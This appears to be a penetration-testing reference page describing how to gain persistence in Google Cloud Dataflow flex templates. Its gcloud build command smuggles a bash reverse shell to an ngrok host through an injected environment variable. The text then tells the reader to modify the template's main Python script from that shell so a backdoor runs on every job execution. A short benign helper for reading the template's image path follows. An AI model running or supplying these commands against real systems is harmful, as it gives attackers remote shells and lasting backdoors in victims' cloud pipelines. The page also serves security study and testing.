GCP - Dataflow Persistence

Support HackTricks

Dataflow

Invisible persistence in the built container

Following the tutorial from the documentation, you can create a new flex template (e.g. a Python one):

git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
cd python-docs-samples/dataflow/flex-templates/getting_started

# Create the bucket where the Dockerfiles and code are going to be stored
export REPOSITORY=flex-example-python
gcloud storage buckets create gs://$REPOSITORY

# Create the Artifact Registry repository for the Docker image
export NAME_ARTIFACT=flex-example-python
gcloud artifacts repositories create $NAME_ARTIFACT \
--repository-format=docker \
--location=us-central1
gcloud auth configure-docker us-central1-docker.pkg.dev

# Create template
export NAME_TEMPLATE=flex-template
gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
--image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
--sdk-language "PYTHON" \
--flex-template-base-image "PYTHON3" \
--metadata-file "metadata.json" \
--py-path "." \
--env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
--env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
--env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
--env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
--region=us-central1

While the template is building, you will get a reverse shell (you can abuse environment variables as in the previous example, or other parameters that make the Dockerfile execute arbitrary commands). At that point, from inside the reverse shell, you can go to the /template directory and modify the code of the main Python script that will be executed (in our example, getting_started.py). Place your backdoor there so that it runs every time the job is executed.

Then, the next time the job is executed, the compromised container that was built will be run:

# Run template
gcloud dataflow $NAME_TEMPLATE run testing \
--template-file-gcs-location="gs://$REPOSITORY/getting_started-py.json" \
--parameters=output="gs://$REPOSITORY/out" \
--region=us-central1
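
To see which container image a re-run will actually pull, it can help to read the template spec file that the build step wrote to the bucket. The sketch below is a hypothetical helper (`template_image` is not part of gcloud or of the original walkthrough). It assumes the spec is JSON with a top-level `image` field, which is how Flex Template spec files are usually laid out:

```shell
# Hypothetical helper: print the container image referenced by a
# Flex Template spec file that has been downloaded locally.
# Assumption: the spec is JSON containing an "image": "<path>" field.
template_image() {
  # Extract the quoted value that follows the "image" key; keep the first match.
  sed -n 's/.*"image"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$1" | head -n 1
}
```

For example, after `gcloud storage cat "gs://$REPOSITORY/getting_started-py.json" > spec.json`, running `template_image spec.json` should print the Artifact Registry path that was passed via `--image-gcr-path`. Since that path uses the `latest` tag, each run resolves to whatever image currently carries that tag.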